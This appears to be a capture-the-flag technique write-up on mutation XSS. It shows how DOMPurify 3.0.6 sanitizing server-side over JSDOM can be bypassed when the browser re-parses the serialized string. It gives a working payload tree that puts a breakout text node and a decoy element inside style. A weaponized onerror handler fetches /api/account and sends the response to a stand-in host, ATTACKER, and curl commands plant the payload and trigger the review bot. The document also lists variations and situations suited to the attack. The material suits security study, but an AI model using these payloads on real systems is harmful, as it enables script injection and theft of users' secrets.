web javascript mxss dompurify jsdom xss parser-differential rawtext

Exploit the parser mismatch between server-side DOMPurify/JSDOM sanitization and browser reparsing of the serialized string.

mXSS through DOMPurify + JSDOM Reparse of a "Safe" Tree

DOMPurify only guarantees that the DOM node tree it returns is safe — it does not guarantee that the string you get back from that tree is safe to feed to an HTML parser again. When sanitization happens server-side over JSDOM and the resulting string is later dropped into innerHTML in a real browser, two different HTML engines touch the same bytes: JSDOM serializes, Chromium re-parses. mXSS lives in that gap.

The trick relies on rawtext elements: style, script, xmp, iframe, noembed, noframes, plaintext, and noscript when scripting is enabled. (textarea and title are parsed in a similar way, but their text is escaped on serialization, so they do not help here.) Per the HTML serialization spec, the text content of these elements is emitted literally, without escaping: a </style> inside a <style> text node comes out as the raw bytes </style>, not &lt;/style&gt;. To JSDOM that is inert character data nested in a node. To Chromium re-parsing the string, that </style> closes the element early and everything after it becomes live markup.
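The serialization rule can be illustrated with a small stand-alone model. This is a sketch, not JSDOM's actual serializer: the plain-object node shape ({ text } or { tag, children }) and the helper names are assumptions made for illustration, and attributes are ignored.

```javascript
// Simplified model of HTML fragment serialization (not JSDOM's real code).
// Nodes are plain objects: { text } or { tag, children }.
const LITERAL_TEXT_PARENTS = new Set([
  'style', 'script', 'xmp', 'iframe', 'noembed', 'noframes', 'plaintext',
]);
const VOID_TAGS = new Set(['br', 'img', 'hr', 'input']);

function escapeText(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

function serialize(node, parentTag = '') {
  if (typeof node.text === 'string') {
    // Text under a rawtext parent is emitted as-is; everywhere else it is escaped.
    return LITERAL_TEXT_PARENTS.has(parentTag) ? node.text : escapeText(node.text);
  }
  const inner = (node.children || []).map((c) => serialize(c, node.tag)).join('');
  return VOID_TAGS.has(node.tag)
    ? `<${node.tag}>`
    : `<${node.tag}>${inner}</${node.tag}>`;
}

const breakout = { text: '</style><img src=1 onerror=alert(1)>' };
console.log(serialize({ tag: 'p', children: [breakout] }));
// <p>&lt;/style&gt;&lt;img src=1 onerror=alert(1)&gt;</p>
console.log(serialize({ tag: 'style', children: [breakout] }));
// <style></style><img src=1 onerror=alert(1)></style>
```

The same text node is harmless under p and a breakout under style; only the parent tag changes.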

Why It Works

  • "Sanitized HTML string" is not a parser-independent concept. A tree that is provably safe inside JSDOM can re-materialize as active markup once a different parser reads its serialization.

  • DOMPurify's intended safe usage keeps everything as nodes (RETURN_DOM_FRAGMENT + replaceChildren) so the string is never re-parsed. The bug appears when the app serializes to a string and re-parses:

    // SAFE: node never re-parsed
    const frag = DOMPurify.sanitize(dirty, { RETURN_DOM_FRAGMENT: true });
    post.replaceChildren(frag);
    
    // VULNERABLE: string is re-parsed by the browser
    post.innerHTML = DOMPurify.sanitize(dirty);
    

    This is forced on you when sanitization is server-side (JSDOM) and insertion is client-side: you cannot ship a live JSDOM node across the wire, only its serialized string.

Vulnerable Pattern

Server sanitizes with DOMPurify over JSDOM and returns the serialized string; the client re-parses it. From the Inkpress challenge (server.js):

const createDOMPurify = require('dompurify');   // 3.0.6 — pre-3.1 anti-mXSS gate
const { JSDOM } = require('jsdom');

function renderDocument(tree) {
  const window = new JSDOM('').window;
  const document = window.document;
  const DOMPurify = createDOMPurify(window);
  const root = document.createElement('article');
  for (const node of tree) root.appendChild(buildNode(document, node, 0));
  return DOMPurify.sanitize(root);          // returns a STRING (the serialized markup of root), not a node
}

// Client-side script of the /p/:id page opened by the editor bot.
// ${data} is a server-side template placeholder for { title, html }; the sanitized string is re-parsed here.
const data = ${data};
document.getElementById('post').innerHTML = data.html;   // <-- reparse sink

Crucially the app lets you build the node tree by hand via a JSON tree of { tag, attrs, children } blocks (buildNode), so you control the exact node shape DOMPurify sees — including giving a rawtext element an element child:

function buildNode(document, spec, depth) {
  if (typeof spec.text === 'string') return document.createTextNode(spec.text);
  const tag = String(spec.tag || '').toLowerCase();
  if (!/^[a-z][a-z0-9]*$/.test(tag)) throw new Error('invalid tag name');
  const el = document.createElement(tag);
  // ...attrs...
  if (Array.isArray(spec.children))
    for (const child of spec.children) el.appendChild(buildNode(document, child, depth + 1));
  return el;
}

The DOMPurify Anti-mXSS Gate (and how to skip it)

DOMPurify ≤ 3.0.x has one defense against exactly this. In _sanitizeElements it force-removes a node whose children are text only but whose text looks like markup:

// purify.cjs.js (DOMPurify 3.0.6)
if (currentNode.hasChildNodes()
    && !_isNode(currentNode.firstElementChild)              // no ELEMENT child
    && regExpTest(/<[/\w]/g, currentNode.innerHTML)
    && regExpTest(/<[/\w]/g, currentNode.textContent)) {
  _forceRemove(currentNode);                                // <style>...</style> killed
}

A <style> whose only child is the breakout text is removed. But the gate is short-circuited the moment the element has an element child: firstElementChild becomes non-null, so !_isNode(currentNode.firstElementChild) is false and the whole condition fails. So:

  • Give <style> a harmless surviving element child (<br>) → gate skipped, <style> survives.
  • Give <style> a text node carrying </style><img ... onerror=...>. DOMPurify (default config, SAFE_FOR_TEMPLATES unset) never treats text inside a rawtext element as markup, so onerror is never stripped.

This element-child bypass is patched in DOMPurify 3.1+.
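To make the short-circuit concrete, here is a rough re-statement of the gate over plain objects. It is a sketch under assumptions: the { text } / { tag, children } node shape and the name gateRemoves are hypothetical, and the parent is assumed to be a rawtext element so that innerHTML and textContent would both expose the text verbatim.

```javascript
// Simplified model of the pre-3.1 gate (not DOMPurify's real code).
// Assumes a rawtext parent, so one check on the joined text stands in for
// the innerHTML and textContent tests.
const LOOKS_LIKE_MARKUP = /<[\/\w]/;

function gateRemoves(node) {
  const children = node.children || [];
  // Stand-in for firstElementChild: is any child an element?
  const hasElementChild = children.some((c) => typeof c.tag === 'string');
  const text = children
    .filter((c) => typeof c.text === 'string')
    .map((c) => c.text)
    .join('');
  return children.length > 0 && !hasElementChild && LOOKS_LIKE_MARKUP.test(text);
}

const breakout = { text: '</style><img src=1 onerror=alert(1)>' };
console.log(gateRemoves({ tag: 'style', children: [breakout] }));                // true
console.log(gateRemoves({ tag: 'style', children: [breakout, { tag: 'br' }] })); // false
```

The text is identical in both calls; the only difference is the extra br sibling.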

Exploit Flow

  1. Confirm the sink is "sanitize server-side over JSDOM → serialize → browser re-parses via innerHTML".
  2. Pick a rawtext element you're allowed to emit (style here).
  3. Give it two children: a benign element child to defeat the anti-mXSS gate, and a text child that closes the rawtext element and injects live markup.
  4. Trigger the page in the victim's browser (here: request an editorial review so the bot opens /p/:id).
  5. In onerror, do the real work — exfiltrate the secret the bot can read.

What DOMPurify sees vs. what the browser sees

DOMPurify walks this tree and considers it clean (text is opaque inside style):

article
└─ style
   ├─ #text  "</style><img src=1 onerror=alert(1)>"   ← opaque chars to JSDOM
   └─ br                                                ← makes firstElementChild non-null

JSDOM serializes the text node literally (rawtext rule), producing:

<article><style></style><img src=1 onerror=alert(1)><br></style></article>

Chromium re-parses that string: the first </style> closes the style early, and <img> becomes a real, live element — onerror fires.
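The browser side can be approximated in a few lines. This is only a sketch of the rawtext end-tag rule, not a real HTML parser: the function name reparseStyle is hypothetical, and it assumes a bare <style> start tag with no attributes.

```javascript
// Rough model of how a browser tokenizer leaves rawtext mode: the style
// element ends at the first "</style" followed by whitespace, "/" or ">".
function reparseStyle(html) {
  const open = html.toLowerCase().indexOf('<style>');
  if (open === -1) return null;
  const bodyStart = open + '<style>'.length;
  const match = /<\/style[\s\/>]/i.exec(html.slice(bodyStart));
  if (!match) return { styleText: html.slice(bodyStart), liveMarkup: '' };
  const closeStart = bodyStart + match.index;
  const gt = html.indexOf('>', closeStart);
  return {
    styleText: html.slice(bodyStart, closeStart),   // what the style element actually contains
    liveMarkup: gt === -1 ? '' : html.slice(gt + 1), // parsed as ordinary markup
  };
}

const serialized =
  '<article><style></style><img src=1 onerror=alert(1)><br></style></article>';
console.log(reparseStyle(serialized));
// styleText is '' and liveMarkup starts with '<img src=1 onerror=alert(1)>'
```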

Final Payload

The JSON tree submitted to /api/posts:

[
  {
    "tag": "style",
    "children": [
      { "text": "</style><img src=1 onerror=alert(1)>" },
      { "tag": "br" }
    ]
  }
]
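When iterating on payloads, it can help to generate this tree rather than hand-edit JSON. A minimal sketch follows; the helper name buildBreakoutTree and its parameters are made up for illustration, while the output shape mirrors the tree above.

```javascript
// Hypothetical helper: wraps arbitrary markup in the two-child rawtext shape
// (breakout text node first, then a benign element child to skip the gate).
function buildBreakoutTree(markup, rawtextTag = 'style', decoyTag = 'br') {
  return [
    {
      tag: rawtextTag,
      children: [
        { text: `</${rawtextTag}>${markup}` },
        { tag: decoyTag },
      ],
    },
  ];
}

console.log(JSON.stringify(buildBreakoutTree('<img src=1 onerror=alert(1)>')));
// [{"tag":"style","children":[{"text":"</style><img src=1 onerror=alert(1)>"},{"tag":"br"}]}]
```

JSON.stringify also takes care of escaping any double quotes inside the markup, which matters once the handler is quoted.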

Weaponized for the challenge: the editor bot carries an httpOnly session cookie, so script cannot read the cookie itself; instead the payload fetches /api/account, which serves the flag ({ role, name, secret: FLAG }), and sends the response off-site. Quote the onerror value: in an unquoted attribute the first > (here, from the arrow functions) or any whitespace would end the value after reparse.

[
  {
    "tag": "style",
    "children": [
      { "text": "</style><img src=1 onerror=\"fetch('/api/account').then(r=>r.text()).then(s=>location='https://ATTACKER/?'+encodeURIComponent(s))\">" },
      { "tag": "br" }
    ]
  }
]

Then publish and request a review so the bot renders it:

# publish, capture the id
ID=$(curl -s http://TARGET/api/posts -H 'Content-Type: application/json' \
  -d '{"title":"x","tree":[{"tag":"style","children":[{"text":"</style><img src=1 onerror=\"fetch(`/api/account`).then(r=>r.text()).then(s=>location=`https://ATTACKER/?`+encodeURIComponent(s))\">"},{"tag":"br"}]}]}' \
  | python3 -c 'import sys,json;print(json.load(sys.stdin)["id"])')

# make the editor bot open it (DWELL gives the XSS time to fire)
curl -s http://TARGET/api/review -H 'Content-Type: application/json' -d "{\"id\":\"$ID\"}"

Variations

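  • Other elements whose text serializes literally: xmp, iframe, noembed, noframes, and noscript (only when the serializer treats scripting as enabled), where the sanitizer config allows them. Same idea: literal serialization of inner text plus an element child to dodge the gate. textarea and title do not qualify, because their text is escaped on serialization.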
  • Comment-boundary mXSS (<style><!--</style>...) and noscript/template quirks are related classes when no element-child gate is in play.
  • If only attribute values serialize, remember that serializers have traditionally escaped only & and double quotes there (plus non-breaking spaces), while < and > survive, so value="</style>"-style breakouts apply.

Common Blockers

  • DOMPurify 3.1+ closes the firstElementChild gate; on patched versions look for a different serialization divergence or a different sanitizer entirely.
  • If both sides use the same engine, or the output is inserted as text (textContent) rather than re-parsed, there is no gap to exploit.
  • Whitespace or a > inside an unquoted onerror value ends the attribute early after reparse, which rules out bare arrow functions; quote the value, or keep it free of both.
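The unquoted-attribute blocker is easy to check before sending a payload. The sketch below models only the tokenizer's unquoted attribute value state (the value ends at the first whitespace character or >); the function name readUnquotedValue is hypothetical.

```javascript
// Rough model of the "attribute value (unquoted)" tokenizer state:
// returns the part of `source` the browser would keep as the attribute value.
function readUnquotedValue(source) {
  const end = source.search(/[\t\n\f\r >]/);
  return end === -1 ? source : source.slice(0, end);
}

console.log(readUnquotedValue('alert(1)>'));
// alert(1)
console.log(readUnquotedValue("fetch('/x').then(r=>r.text())>"));
// fetch('/x').then(r=
console.log(readUnquotedValue('alert( 1 )>'));
// alert(
```

If the returned value differs from the handler you intended, wrap the value in quotes instead.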

Good Situations To Use It

  • Sanitization happens server-side over JSDOM, then the string is re-inserted via innerHTML in a browser.
  • You control the node tree precisely (e.g. a JSON block builder) and rawtext elements are allowed.
  • A privileged headless bot opens your content and holds a secret/cookie worth stealing.
